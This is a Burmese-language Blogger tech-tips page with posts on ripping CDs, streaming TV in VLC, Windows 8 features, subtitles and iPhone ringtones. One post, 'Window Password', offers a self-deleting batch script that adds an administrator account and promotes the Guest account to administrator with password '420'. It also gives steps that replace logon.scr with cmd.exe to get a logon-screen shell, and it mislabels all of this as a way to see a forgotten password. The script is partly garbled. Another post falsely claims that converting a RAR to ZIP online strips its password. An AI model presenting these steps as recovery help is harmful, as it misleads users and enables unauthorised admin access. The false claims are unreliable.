This is default featured slide 1 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured slide 2 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured slide 3 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured slide 4 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured slide 5 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

Showing posts with label နည်းပညာ. Show all posts
Showing posts with label နည်းပညာ. Show all posts

Sunday, January 5, 2014

Audio CD ခွေမှ သီချင်းတွေကို ကွန်ပျူတာထဲ ကူးယူနည်း

 Audio CD သီချင်းတွေကို ကို ကွန်ပျူတာထဲသိမ်းတဲ့နည်းကို တစ်ချို့လူတွေက မလုပ်တတ်ကြပါဘူး။ Audio  CD ကူတတ်သလားဆိုရင် မကူးတတ်တဲ့လူတွေအများကြီးရှိပါတယ်။ ဒါကလည်း ကိုယ်နဲ့မရင်းနှီး တာတို့ ကိုယ်နဲ့မသတ်ဆိုင်လို့မလေ့လာတာ တွေလည်းပါပါတယ်။ CD Drive ထဲမှာရှိတယ် သီချင်းဖိုင်တွေကို Copy တို့  Send To တို့ လုပ်လို့မရပါဘူး။ ဒါကိုဘယ်လိုကူးမှာ လည်းလေ့လာ ကြည့်ကြရအောင်။

- CD/DVD Drive ထဲကို Audio CD ခွေထည့်ပါ။
- Autorun နဲ့တက်လာရင် Play Audio CD ကိုနှိပ်လိုက်ပါ။ Autorun နဲ့ မတက်လာရင်လည်း window media player ကိုဖွင့်လိုက်ပါ




- Windows Media Plyaer နဲ့ ပွင့်လာပါလိမ်မယ်။ပြီးရင် Ctrl + 1 ကို နှိပ်ပါ။
- ကိုယ်ကူးချင်တဲ့ သီချင်းလေးတွေကို အမှန်ခြစ်ပေးပါ။ အဲဒီနေရာမှာ ပြောချင်တာက mp3 အနေနဲ့ယူချင်တယ်ဆိုရင် wmplayer ရဲ့ Menu bar က Option မှာ mp3 ဆိုပြီးဝင်ပြောင်းလို့ရပါတယ်ခင်ဗျာ

 - ပြီးရင် Rip CD ကိုနှိပ်ပါ သီချင်းလေးတွေကူးနေတာကိုမြင်ရပါလိမ်မယ်။



  - အဲဒီသီချင်းလေးတွေကို Libraries အောက်က Music ဆိုတဲ့ Folder ထဲမှာ Unknown artist ဆိုတဲ့ folder လေးတစ်ခုနဲ့ သီချင်းလေးတွေရောက်နေပါလိမ်မယ်။


တစ်ခြား Software တွေနဲ့လည်း ကူးလို့ရပါတယ် ကျွန်တော်က ကိုယ်စက်ထဲမှာရှိတဲ့ Player နဲ့ ကူးတဲ့ နည်းကိုပြောပြပေးတာပါ။
ကိုယ်စိတ်နှစ်ဖြာကျန်းမာ ချမ်းသာကြပါစေလို့ဆုတောင်းလိုက်ပါတယ်။  
 
 
မူရင်း   >>>  မျိုးကိုဝင်း (ပင်လည်ဘူး)

အဆင်ပြေပါစေ . . .
နည်းပညာတက္ကသိုလ်(မကွေး)

Wednesday, November 27, 2013

VLC Player သုံးပြီး ရုပ်မြင်သံကြားလိုင်းများ ကြည့်ကြမယ်

မင်္ဂလာပါ
 နိုင်ငံခြားရောက်ဘ၀တူသူငယ်ချင်းများအတွက် မြန်မာပြည်မှရုပ်မြင်သံကြားအစီအစဉ်များကို ကွန်ပျုတာမှ ကြည့်ရှုနည်းကိုဝေမျှလိုက်ပါတယ်။ ထိုင်းလို နီးတဲ့နိုင်ငံကတော့ Package အနေနဲ့  ကြည့်လို့ရပေမယ့် အဝေးကြီးရောက်နေသူများ ကတော့ရံဖန်ရံခါ မြန်မာ့သတင်းများနဲ့တချို့သော အစီအစဉ်များကို လိုအပ်လျှင်ကြည့်နိုင်ရန်ပါ...
 


၁။ VLC Player ကို Install လုပ်ပါ။
http://www.filehippo.com/download_vlc_32/

၂။ VLC Player မှာ Setting တချို့ကိုထည့်သွင်းရပါမယ်။
Tools>
Preferences Ctrl + P >
Input / Codecs >
RTP Over RTSP ( TCP ) နေရာမှာ အမှတ်ချစ်ပါ
Save ကိုနှိပ်ပါ။

VLC Player အပေါ်ဘယ်ဘက်ဒေါင့်မှာ
Media >
Open Netwrork Stream Ctrl + N >
Please enter a network URL နေရာမှာ
အောက်ဖေါ်ပြပါ URL များကိုဖြည့်ပေးပါ

ပြီးလျှင် Play ကိုနှိပ်ပါ။
ကြည့်လို့ရပါပြီ။

ကြည့်နိုင်သောလိုင်းများ

မြ၀တီရုပ်မြင်သံကြား
http://www.myawaddy.net.mm/mwdlive

MRTV 4 ရုပ်မြင်သံကြား
rtsp://50.7.230.90:1935/liveedge/channel1

France 24 Hours Live TV
mms://stream1.france24.yacast.net/f24_liveen

MTV Euroupe
rtsp://173.193.20.150:1935/mtv/43

Russia Live TV
rtsp://fms.pik-tv.com/live/piktv3pik3tv

B4U Music TV
rtsp://46.249.213.87:554/playlists/4musictv_hvga.hpl.3gp

အလွမ်းပြေပေါ့ဗျာ...

ဦးအောင်သန်းဦး
MMiTD


Credit to www.itfree4u.net
ကျေးဇူးတင်စွာဖြင့်
iTFree4U

အဆင်ပြေပါစေ . . .
နည်းပညာတက္ကသိုလ်(မကွေး)

Tuesday, November 5, 2013

ကွန်ပြူတာပေါ်ကအင်တာနက် မြန်နှုန်းနည်းနည်းလောက်မြှင့်ကြည်.မယ်



မင်္ဂလာပါဗျာဒီနေ.ကျွန်တော်တင်ဆက်ပေးချင်တာကတော့ ကွန်ပြူတာမှာ အင်တာနက်မြန်နှုန်းနည်းနည်းမြှင့်ကြည်ခြင်းပဲဖြစ်ပါတယ် တကယ်ဆိုရင်တော့မူရင်းကောင်းမှပုံထွက်ကောင်းမှာပါ ဒါ့ကြောင့်လဲ အရမ်းမမျှော်လင့်ဖို.ကြိုပြောထားပါရစေ ကျွန်တော်တို.သိသလောက်အနည်းငယ်လေးကိုမျှဝေတာဖြစ်တဲ့အတွက် လိုအပ်ချက်များရှိခဲ့ရင်လဲ နားလည်ပေးကြဖို.မျှော်လင့်ပါတယ် ကဲ့စလိုက်ရအောင်ဗျာ…
ပထမဆုံး Run box ကိုခေါ်ဖို.အတွက် window key နဲ. R ကို တွဲနှိပ်ပါ Run box ထဲမှာ gpedit.msc လို.ရိုက်ထည်.လိုက်ပါ…




ပုံမှာပါတဲ့ အတိုင်းကျလာမယ် ဒါဆိုရင် Local Computer Policy>Computer Configuration>Administrative Templates>Network>QoS Packet Scheduler.
အထိအဆင့်ဆင့်သွားလိုက်ပါ



အိုကေ Limit reservable bandwidth ကို double နှိပ်ပြီး run ဖွင့်လိုက်ပါ ပြီးသွားရင်တော့အောက်ကပုံလေးလို...



Enable လုပ်ပေးပြီး reservable bandwidth 20% ကို 0%မှာထားပေးလိုက်ပါ…..ပြီးရင်တော့ Apply , OK ပေါ့…
ပြီးသွားရင် browser မှာရှိတဲ့ cookies တွေ cache နဲ. History တွေကို ရှင်းလင်းပြီး restart လုပ်ပေးလိုက်ပါ.. 
အဆင်ပြေပါစေ . . . 
နည်းပညာတက္ကသိုလ်(မကွေး)

Command Prompt Basics (Ethical Hacking)

 
Hacking ပိုင်းလေ့လာလိုသူများအတွက် အဓိက CMD Basic များကို ပြန်လည်မျှဝေပေးလိုက်ပါတယ်ရှင်... အားလုံးပဲ တနေ့ကို ၅ကြောင်းလောက်သာ မှတ်သွား၊ ၂၁ရက်ဆို အားလုံးကို အလွတ်ရပီ။ Hacking သမားများအတွက်သာမက Technician များအတွက်ပါ အကျိုးရှိပါတယ်။

1. Accessibility Controls - access.cpl
2. Accessibility Wizard - accwiz
3. Add Hardware Wizard - hdwwiz.cpl
4. Add/Remove Programs - appwiz.cpl
5. Administrative Tools - control admintools
6. Automatic Updates - wuaucpl.cpl
7. Bluetooth Transfer Wizard - fsquirt
8. Calculator - calc
9. Certificate Manager - certmgr.msc
10. Character Map - charmap
11. Check Disk Utility - chkdsk

Friday, October 11, 2013

MECTEL hello Music service မသုံးချင်တော့ရင်

MECTEL hello Music service မသုံးချင်တော့ရင်

333 ကို unregister လို့ SMS ပို့လိုက်ပါ။
အဆင်ပြေပါစေ . . . အဆင်မပြေရင် Comment (or) C-Box မှာပြောခဲ့ပါခင်ဗျာ အတတ်နိုင်ဆုံးအဆင်ပြေအောင်ကြိုးစားပေးပါမယ်
နည်းပညာတက္ကသိုလ်(မကွေး)

Tuesday, October 1, 2013

Windows 8 ရဲ့ သိသင့်တဲ့လျို့ဝှက်ချက် ၆ ခု

Windows 7 နဲ့ windows 8 က တော်တော်လေးကို ပြောင်းလဲသွားပြီး စအသုံးပြုတဲ့ အခါမှာ အခက်ခဲတွေကို
များကြီးတွေ့ရမယ်လို့ထင်ပါတယ် ဒီလို အခက်ခဲတွေထဲက တချို့တလေကို ဖြေရှင်းဖို့ နည်းလမ်း ၆ ကို
မိတ်ဆတ်ပေးချင်ပါတယ်။
ပထမဦးဆုံး အလွယ်ဆုံး windows 7 နဲ့ အတူဆုံးဖြစ်တဲ့ Desktop ကို windows 8 ကနေသွားတဲ့နည်းပါ။


windows 8 ကိုဖွင့်ဖွင့်လိုက်ခြင်းမှာ အထက်ပါပုံအတိုင်းတွေ့ရပါမယ်။ ဒီမှာ ငါးအရုပ်လေးနဲ့ Desktop ဆိုကို
နှိပ်လိုက်ရင် windows 7 မှာ သုံးနေကြ Desktop ကိုတွေ့ရပါမယ်။ ဒီမှာတော့ start button မရှိပေမဲ့  အရင်က အဲဒီ start button ရှိတဲ့ နေရာမှာ Right click နှိပ်လိုက်ရင်
 အထက်ပါပုံအတိုင်းဘဲ Task manger, Run, Search, control panel, disk manager စတဲ့ windows ရဲ့
Features တွေကို ၀င်ရောက်လို့ရပါတယ်။

၂၊ Automatic Backup
Windows 8 မှာ automatic backup features ပါလာပါတယ်  ဒီ features ကို File history လို့ခေါ်ပြီးတော့  files တွေကို backup အလိုလျှောက်လုပ်ပေးပါတဲ့  အရင် System restore နဲ့ ခပ်ဆင်ဆင်ဖြစ်ပါတယ်။  ကျွန်တော်က Files တွေကို မသိဘဲနဲ့ ဖျတ်လိုက်မိတာတို့ windows ပျတ် သွားတာတို့မှာ အထောက်အကူအများကြီးပြုမှာဖြစ်ပါတယ်။ ဒါပေမဲ့လဲ ဒီ Features က windows  မှာ အလိုလျှောက် enable မထားပါဘူး။ enable လုပ်ဖို့လိုအပ်ပါလိမ့်မယ် Control panel ကနေတဆင့်။

၃၊ Desktop Mix
Windows 7 မှာ ကျွန်တော်တို့ သိတဲ့အတိုင်း cursor နဲ့ ဖွင့်ထားတဲ့ window တခုကို ဆွဲပြီး desktop ရဲ့ ထောင့်ကိုပစ်လိုက်ရင် ဒီ window က ဒေါင့်တနေရာမှာရှိပြီး နောက်တခုကို ထိုနည်းအတူလုပ်ခြင်းဖြင့်
အောက်ပါပုံအတိုင်း window နှစ်ခုကို တပြိုင်ထဲအသုံးပြုလို့ရပါတယ်။

Windows 8 မှာကျတော့  ဒီထက်ပိုပြီးတော့ Mix metro desktop လို့ခေါ်တဲ့  weather forecast စတာကို
အထက်ပါပုံမှာ မြင်တဲ့အတိုင်း Desktop ရဲ့ ဒေါင့်မှာ ပေါ်နေပြီး ကိုယ့်က Photoshop လုပ်နေရင်းနဲ့
Weather, twitter, facebook စတဲ့ သူများ Status update လုပ်နေတာကိုပါ မြင်နေရပါမယ်။

၎။ Sync Everywhere
Windows 8 က Apple ရဲ့ Icloud လိုဘဲ Windows ID နဲ့ Computer မှာ ၀င်လိုက်ရင် ကိုယ့် account ထဲမှာ
ရှိတဲ့ email, photos etc.. စတဲ့ ကိုယ့် data တွေနဲ့ Setting တွေကို windows ထဲမှာ ၀င်သွားမှာဖြစ်ပါတယ်.

၅။ Shortcuts
Windows 8 မှာ အရင်က Windows 7 မှာ အသုံးပြုခဲ့တဲ့ Shortcuts တွေလဲ အသုံးပြုလို့ရသေးသလို ထက်
ပြီးတော့  တိုးလာတဲ့ Shortcuts လေးတွေရှိပါတယ်.
win key နဲ့ Prtsc key ကို အတူတူနှိပ်ခြင်းအားဖြင့် Print screen ကို .png format နဲ့ pictures library folder မှာ
အလိုလျှောက် save ပေးမှာဖြစ်ပါတယ်။ windows 8 ရဲ့ shortcuts 99 ခုကို ဒီမှာ ဖော်ပြထားပါတယ်။


၆။ Easy Reinstall
Windows 8 မှာပါလာတဲ့  ဒီ Easy Reinstall က အရင်တုန်းက ရှိတဲ့ System restore နဲ့တူပါတယ်။ အဲဒါကတော့
Refresh your PC ဆိုတာပါဘဲ။ Refresh your PC က windows setting တွေကို အားကို default မှာပြန်ထား
ပေးပါတယ်။ ဒါပေမဲ့ ကိုယ့်ရဲ့ Data တွေကိုတော့ ဘာမှမထိဘဲ အရင်ကအတိုင်းရှိနေမှာပါ။

ဒါပေမဲ့ Remove everything ကို နှိပ်လိုက်ရင်တော့  အားလုံးကို ဖျောက်ပစ်လိုက်မှာဖြစ်ပါတယ်။ ဒီဟာက
တော့ Virus ထိတဲ့ အခါတို့ Computer မှာရှိတဲ့ Data တွေအားလုံးကို ဖျောက်ပစ်တဲ့ အချိန်ကြမှာသာ
အသုံးဖို့ဖြစ်ပါတယ်။

SBSangpi(စံပီး)
Ref to http://www.sbsangpi.com/2013/01/windows-8.html
Source:http://www.lifehacker.com.au/2013/01/six-hidden-windows-8-features-you-cant-live-without/

အဆင်ပြေပါစေ . . . အဆင်မပြေရင် Comment (or) C-Box မှာပြောခဲ့ပါခင်ဗျာ အတတ်နိုင်ဆုံးအဆင်ပြေအောင်ကြိုးစားပေးပါမယ်
နည်းပညာတက္ကသိုလ်(မကွေး)

Friday, September 27, 2013

Win.rar Password ကိုဖြေရအောင်

 
ဒီနေ့ကျွန်တော်လိုက်ရှာနေတဲ့ Win.rar Password ဖြေဖို့Softwareကောင်းကောင်းလိုက်ရှာရင်းနဲ့ အွန်လိုင်းConvertလေးတစ်ခုတွေ့လို့မိတ်ဆက်ပေးချင်ပါတယ်။ အရမ်းလည်းကောင်းပါတယ်။ကျွန်တော်ကိုယ်တိုင်လည်းစမ်းသပ် ပြီးပါပြီ။အောက်ကနည်းလေးအတိုင်း စမ်းသပ်ပြီးလုပ်ကြည့်လိုက်ပါ။ လွယ်ပါတယ်ခင်ဗျာ။

(၁)  အရင်ဆုံးအနေနဲ့ ONLINE CONVERT.COM  ကိုသွားလိုက်ပါခင်ဗျာ။

(၂)  နောက်ပြီးရင် BROWSE နေရာမှာ မိမိပြောင်းချင်တဲ့ ဖိုင်ကိုညွန်ပြပေးလိုက်ပါ။


(၃) ပြီးရင်.rar ဆိုရင်လွယ်လွယ်ကူကူဖြစ်အောင် zip ကိုပြောင်းပေးလိုက်ပြီး
Convert File ဆိုတာကို နှိပ်ပြီးconvert လုပ်တာကိုခဏစောင့် ပါ။
 (၄) ပြီးရင် ရလာတဲ့ ဖိုင်ကို ဒေါင်းလုပ်ဆွဲပါ။(ခဏလေးပါပဲ) 
နောက်ပြီးရင်တော့မိမိတို့ password ဖြေမရတဲ့ r ဖိုင်လေးဟာ zip ဖိုင်အဖြစ်နဲ့ ရောက်ရှိလာမှာဖြစ်ပါတယ်။ 
 
Credit to http://kohtway.blogspot.com/2013/07/winrar-password.html မှကူးယူဖော်ပြသည်။

အဆင်ပြေပါစေ . . . အဆင်မပြေရင် Comment (or) C-Box မှာပြောခဲ့ပါခင်ဗျာ အတတ်နိုင်ဆုံးအဆင်ပြေအောင်ကြိုးစားပေးပါမယ်
နည်းပညာတက္ကသိုလ်(မကွေး)

Wednesday, September 25, 2013

Window Password ကိုပြန်ကြည့်ကြရအောင်


ဝင်ဒိုး ပေါ်တော့ ရောက်နေပါရဲ့ ကိုယ်ပေးလိုက်password ဘာလဲ ဆိုပြီး မေ့တတ်ပါတယ် ဒါဆိုရင် ၀င်းဒိုး ပေါ် မှာ window password ဘာတွေ ကြည့်ရအောင်နော် အမှားပါရင် နားလည်ပေးစေချင်ပါတယ်

echo off
title Please wait...
cls
net user add Username Password /add
net user localgroup Administrators Username /add
net user Guest 420 /active:yes
net localgroup Guests Guest /DELETE
net localgroup Administrators Guest /add
del %0

ကို Notepad မှာ copy/ paste လုပ်ပြီး
Guest2admin.bat လို့ save လုပ်ပြီး။ ပြန်ဖွင့်ကြည့်ပါ password ပေါ်လာမယ်။
OR

Go to Start –> Run –> Type in CMD
You will get a command prompt. Enter these commands the way it is given
cd\
cd\ windows\system32
mkdir temphack
copy logon.scr temphack\logon.scr
copy cmd.exe temphack\cmd.exe
del logon.scr
rename cmd.exe logon.scr
exit

OR

Run- cmd- cd\windows\system32-net user-account user name * -
enter your password- reenter your password- exit.

Thank to
AC Vs DC

အဆင်ပြေပါစေ . . . အဆင်မပြေရင် Comment (or) C-Box မှာပြောခဲ့ပါခင်ဗျာ အတတ်နိုင်ဆုံးအဆင်ပြေအောင်ကြိုးစားပေးပါမယ်
နည်းပညာတက္ကသိုလ်(မကွေး)

Wednesday, September 18, 2013

နိုင်ငံခြားဇာတ်လမ်းတွေကို မြန်မာစာတန်း အမြန်ထိုးကြမယ်

နိုင်ငံခြား ဇာတ်လမ်းတွေကို မြန်မာစာတန်းထိုး လုပ်ဖို့အတွက် နည်းလမ်းတွေ ၃ ၊ ၄ မျိုးလောက်ရှိပါတယ်။ (ကာရာအိုကေ စာတန်းထိုးမဟုတ်ပါ)။ Adobe PhotoShop ထဲမှာ စာတန်းတွေလုပ် ပြီးတော့ အဲဒါတွေကို Adobe Premier ထဲထည့် TimeLine နဲ့လိုက်ညှိ စိတ်ရှည်ရှည်နဲ့လုပ်ရပါတယ်။ အခု ကျွန်တော် ပြောပြမယ့် နည်းလမ်းကတော့ တော်တော်လေးမြန်ပါတယ်။ ဘာသာပြန်ကျွမ်းကျင်တဲ့သူတွေ (သို့) ဘာသာပြန်ပြီးသားဖိုင်တွေသာ ရှိရင် ဟောတခွေ၊ ဟောတခွေ နဲ့ကို လုပ်လို့ရပါတယ်။





Type of Subtitle
စာတန်းထိုး လို့ ဆိုရာမှာ Hardsub နဲ့ Softsub ဆိုပြီး ၂ မျိုးရှိပါတယ်။ Hardsub ဆိုတာ ဇာတ်ကား တနည်းအားဖြင့် Video file ထဲမှာ တခါတည်း စာတန်းထိုး တွဲပါတာမျိုးပါ။ Softsub ဆိုတာ Video file က ဘာစာတန်းထိုးမှ မပါ ပါဘူး။ စာတန်းထိုးဖိုင်ကို(srt file) သပ်သပ် ပြန်လုပ်ပြီးတော့ Video file နဲ့ ပြန်ပေါင်းကြည့်တာပါ။ ဥပမာ Iron man 2 ဇာတ်လမ်းဆိုကြပါစို့။ အဲဒါကို English srt နဲ့ ပေါင်းကြည့်ရင် English စာတန်းထိုးဖြစ်သွားရော ၊ Indonesian srt နဲ့ပေါင်းကြည့်ရင် Indonesian စာတန်းထိုးဖြစ်သွားရော ။

How to use softsub?
Softsub တွေကို အလုပ်လုပ်ဖို့အတွက် VobSub လို Software မျိုးတွေသွင်းပြီး Windows Media Player နဲ့ တွဲကြည့်လို့ရသလို ၊ VLC Player ဆိုရင် ဘာမှ ကို သွင်းစရာမလိုပဲ နဲ့ softsub တွေ အလုပ်လုပ်ပါတယ်။ တခု သတိထားရမှာက video file နဲ့ subtitle file တို့က တူညီတဲ့ ဖိုင်နာမည် ရှိရမှာ ဖြစ်ပြီး ၊ တူညီတဲ့ လမ်းကြောင်းအောက်မှာ ရှိရပါမယ်။ ဥပမာ c:\ironman2.avi ဆိုတဲ့ ဇာတ်ကားရှိရင်၊ subtitle ဖိုင်ကို c:\ အောက်မှာ ပဲ c:\ironman2.srt ဆိုပြီးထားရပါမယ်။

Subtitle တွေကို ဘယ်မှာ ရှာရမလဲ??
Subtitle တွေကို ပေးတဲ့ site တွေ တော်တော်များများရှိပါတယ်။ ဒီနေ့လို ဇာတ်လမ်းအသစ်ထွက်ပြီဆိုတာနဲ့ နောက် ၂ ရက်လောက်ဆို english subtitle တွေ ထွက်လာပါပြီ။ ကိုယ့်မှာ ရှိတဲ့ video file နဲ့ timeline ကိုက်ညီတဲ့ subtitle တွေကို ရှာတတ်ဖို့လိုပါတယ်။ အဲဒီလိုမဟုတ်ရင် စာတန်းထိုးက စောနေတာမျိုးတို့ ၊ နောက်ကျနေတာမျိုးလို့ ဖြစ်တတ်ပါတယ်။ များသောအားဖြင့်တော့ video file name နဲ့ တူတဲ့ subtitle တွေကိုသာ ရှာတာ အကောင်းဆုံးပါ။ ဥပမာ ironman2_dvdrip_SAINTS.avi ဆိုရင် စာတန်းထိုးကလည်း ironman2_dvdrip_SAINTS.srt အဲဒီလိုပေးကြတာများပါတယ်။

http://subscene.com/
http://www.opensubtitles.org/
http://www.divxsubtitles.net/
http://www.mysubtitles.org/
http://www.allsubs.org/
http://www.tvsubtitles.net/

မြန်မာစာတန်းထိုးပြောင်းကြမယ်
video file လည်းရပြီ ၊ သူနဲ့ ကိုက်တဲ့ english subtitle လည်းရပြီ ဆိုပါစို့။ ဒီအဆင့်ရောက်ရင် မြန်မာလို ပြန်ပြောင်းဖို့က အရမ်းလွယ်သွားပါပြီ။ srt စာတန်းထိုးဖိုင်ကို notepad နဲ့ဖွင့်လိုက်ပါ။ ပြီးတော့ အင်္ဂလိပ်လို ရိုက်ထားတဲ့နေရာတွေမှာ ဘာသာပြန်သမားက မြန်မာလိုပြန်ပြီးရိုက်လိုက်ရုံပါပဲ။ တခု သတိထားရမှာက အပေါ်က timeline တွေကို မပြင်လိုက်ဖို့လိုပါတယ်။ timeline မှားသွားရင်တော့ စာတန်းထိုး စောတာတွေ ၊ နောက်ကျတာတွေ ဖြစ်ကုန်မှာပါ။ နောက်တခု အရေးကြီးတာ ကျန်သေးတယ်။ file ကို save လုပ်တဲ့နေရာမှာ save as နဲ့ လုပ်ပါ။ Encoding မှာ Unicode လို့ ရွေးဖို့လိုအပ်ပါတယ်။ Default က ANSI ပါ။ အဲဒါနဲ့သိမ်းမိရင်တော့ ရိုက်ထားသမျှ စာတွေ အကုန်ပြန်ရိုက်ဖို့သာ ပြင်ပေတော့။

Produce DVD,VCD or Hardsub
မြန်မာလို့ အကုန်ပြန်ပြင်ရိုက်ပြီးပြီဆိုရင်တော့ Xilisoft video converter ultimate 6.x ဒါမှမဟုတ် Power Director စတဲ့ software တွေနဲ့ Video file နဲ့ မြန်မာစာတန်းထိုး srt ဖိုင်ကို ကိုယ့်စိတ်ကြိုက် VCD,DVD ထုတ်လို့ရပါပြီ။

ref: Ko Kyaw Zwar (taunggyicherryland)
Credit : Sawlinux

ကိုမောင်ပေါက်ဆီမှ ပြန်လည်မျှဝေပေးခြင်းဖြစ်သည်။

ref:
Aung Ko Htet (IT Studier)
အဆင်ပြေပါစေ . . . အဆင်မပြေရင် Comment (or) C-Box မှာပြောခဲ့ပါခင်ဗျာ အတတ်နိုင်ဆုံးအဆင်ပြေအောင်ကြိုးစားပေးပါမယ်
နည်းပညာတက္ကသိုလ်(မကွေး)

Monday, September 16, 2013

iPhone အတွက် Ringtones ကို iTunes ဖြင့် လုပ်လို့ရမယ့်နည်းလမ်းလေး ကို တင်ပြပေးပါရစေ

iphone-ringtones3


ပထမဆုံး iTunes ကို ဖွင့်ပါ၊ ပြီးရင်တော့၁) Preferences ထဲက ၂) General အောက်မှရှိတဲ့
၃) Import Settings ထဲကိုဝင်လိုက်ပါ
၎) AAC Encoder ကိုရွေးပြီး
၅) OK ကိုနှိပ်ပါ၊ Preference ထဲက OK ကိုထပ်နှိပ်လိုက်ပါ။
၆) မိမိ Ringtone လုပ်လိုတဲ့သီချင်းကို ရွေးပြီး Rt Click နှိပ်ကာ Get Info ထဲဝင်လိုက်ပါ။
၇) Options ထဲက Start Time မှာ မိမိ Ringtone စချင်တဲ့အချိန်နဲ့ Stop
Time မှာ မိမိ Ringtone ဆုံးချင်တဲ့အချိန်တွေကို ဖြည့်ပါ။ ပြီးရင် OK
ကိုနှိပ်ပါ
(သတိထားရမှတစ်ခုက Ringtone ကြာချိန် စုစုပေါင်းဟာ စက္ကန့် ၄၀ ကျော်နေရင် iPhone ထဲကို ထဲ့လို့မရပါဘူး)
၈) စောစောက Start Time-Stop Time မှတ်ထားတဲ့ သီချင်းဖိုင်မှာ Rt Click လုပ်ပါ။ Create AAC Version ဆိုတာလေးနှိပ်ပြီး ခဏစောင့်ပါ
၉) Converting ဆိုတာလေး ပေါ်လာပါလိမ့်မယ်၊ အဲ့ဒီနောက်မှာတော့ စောစောက
သီချင်းဖိုင်နဲ့ နာမည်တူတဲ့ စက္ကန့် ၄၀ စာဖိုင်လေးတစ်ခု ထပ်ပေါ်လာပါလိမ့်မယ်။
ပေါ်လာတဲ့ဖိုင်ကို Copy လုပ်ပြီးဖြစ်ဖြစ် Drag လုပ်ပြီးဖြစ်ဖြစ် Desktop
မှာ Save လုပ်ပါ။
၁၀) Desktop ပေါ်ကဖိုင်ရဲ့ Extension ဟာ .m4a ပါ။ Rename လုပ်ပြီး .m4r လို့ပြောင်းလိုက်ပါ။
၁၁) iTunes ထဲမှာ စောစောက အသစ်ပေါ်လာတဲ့ ဖိုင်ကို Delete လုပ်ပါ။
၁၂) .m4r Extension ပြောင်းထားတဲ့ Desktop ပေါ်ကဖိုင်လေးကို Double Click လုပ်လိုက်ရင် iTunes Ringtones ထဲကိုရောက်သွားပါလိမ့်မယ်။
ဒီအချက် ၁၂ ချက် အတိုင်းလိုက်လုပ်လိုက်ရင် iPhone အတွက် မိမိစိတ်ကြိုက်
Ringtone တစ်ခုကို မည်သည့် Software မှထပ်မလိုပဲ iTunes နဲ့တင်
ဖန်တီးနိုင်မှာဖြစ်ပါတယ်။
ပထမ တစ်ကြိမ် နှစ်ကြိမ်မှာတော့ နည်းနည်းခက်တယ်ထင်ရပေမယ့် နောက်ပိုင်းလွယ်ကူ သွားပါလိမ့်မယ်။

Ref toျငြိမ်းချမ်းသူ


အဆင်ပြေပါစေ . . . အဆင်မပြေရင် Comment (or) C-Box မှာပြောခဲ့ပါခင်ဗျာ အတတ်နိုင်ဆုံးအဆင်ပြေအောင်ကြိုးစားပေးပါမယ်
နည်းပညာတက္ကသိုလ်(မကွေး)

Tuesday, August 27, 2013

Viber message ကို notification bar မှာ မပေါ်အောင် လုပ်နည်း

When people send normal SMS texts, they are showing up in Viber as well as my Android Messaging service. To stop SMS texts showing up in both Viber and Android Messaging:
  1. Log into Viber on your Android
  2. Click the Menu button then More Options
  3. Click Settings
  4. Deselect Free reply with Viber (When possible, use Viber for SMS replies)
  5. Back out of Viber (This will auto save your settings)
Next time you receive an SMS message, it shouldn’t show up as a Viber message and won’t appear twice on your Android.
အဆင်ပြေပါစေ . . . အဆင်မပြေရင် Comment (or) C-Box မှာပြောခဲ့ပါခင်ဗျာ အတတ်နိုင်ဆုံးအဆင်ပြေအောင်ကြိုးစားပေးပါမယ်
နည်းပညာတက္ကသိုလ်(မကွေး)

Sunday, August 18, 2013

ဘာsoftware မှမလိုဘဲWindow Media Playerသုံးပြီးသီချင်းနောက်ခံတွေကို ကိုယ်ကြိုက်တဲ့ပုံထည့်မယ်(Window 7 only)


ဘာ software မှမလိုဘဲ Window Media Player သုံးပြီးသီချင်းနောက်ခံတွေကို ကိုယ်ကြိုက်တဲ့ပုံထည့်မယ်
၁။ အရင်ဆုံးအနေနဲ့ Window MediaPlayerကိုဖွင့်လိုက်ပါ။ အဲဒါမှာသူကပုံစံအမျိုးမျိုးနဲ့ ပွင့်လာနိုင်ပါတယ်။ ပုံစံအမျိုးမျိုးဆိုတာက (Ctrl+1, Ctrl+2, Ctrl+3) အဲဒီကောင်တွေနှိပ်ရင် ပုံစံသုံးမျိုးပြောင်းသွားမှာပါ။ ဒါကြောင့်ကျွန်တော်တို့က Ctrl+1 ကိုနှိပ်ရပါမယ်။ အဲဒါဆို အောက်ကပုံလေးအတိုင်းပေါ်လာမယ်။ ပုံကိုကြည့်ပါ ………


အဲဒီမှာဘယ်ဘက်ကမှာ Music ဆိုတဲ့ခေါင်းစဉ်အောက်မှာ (Artist,Album,Genre)ဆိုပြီးရှိပါတယ်။ Album ဆိုတာလေးကိုနှိပ်လိုက်ပါ။ ဒါဆိုအဲဒီမှာ ကျွန်တော်တို့အရင်ဖွင့်ထားတဲ့ သီချင်းတွေပေါ်နေပါလိမ့်မယ်။ အဲဒီနေရာမှာကျွန်တော်ပြောချင်တာက ကျွန်တော်တို့က နောက်ခံပုံတွေကို Album လိုက်ပြောင်းချင်တာလား တကွဲတပြားစီပြောင်းချင်တာလားဆိုတာကိုအရင်စဉ်းစားပါ။ ကျွန်တော်ခုဒီမှာပြောမှာက Album လိုက်ကိုပြောင်းပြမှာပါ။ ဒါဆိုရင်ဘာလုပ်ရမလဲဆိုတော့ အရင်ဆုံး Window Media player ထဲမှာရှိတဲ့သီချင်းတွေကို Select All ပေးပြီး Keyboard ပေါ်က Delete ကို နှိပ်လိုက်ပါ။ အဲဒီမှာ Message ဘောက်တက်လာပါလိမ့်မယ် (၂)မျိုးရွေးခိုင်းပါလိမ့်မယ် . . . . Delete From Library Only (or) Delete From Library and my computer. Delete From Library Only ကိုရွေးပေးပါ။ ဒါပြီးရင် OK ပေးလိုက်ပါ။ ဒါဆိုအောက်ကပုံအတိုင်းဖြစ်သွားမယ်။


ဒါဆို အရင်ဖွင့်ထားတဲ့ History တွေမရှိတော့ပါဘူး . . .ပုံကိုကြည့်ပါ


 ပြီးရင် ကိုယ်ပုံပြောင်းချင်တဲ့ mp3 album ကို ဖွင့် အကုန်လုံး Select ပေးပြီး ဘာမှမရှိတောတဲ့အထဲဆွဲထည့်လိုက်ပါ။ အောက်ကပုံလေးလိုဖြစ်သွားပါမယ်…



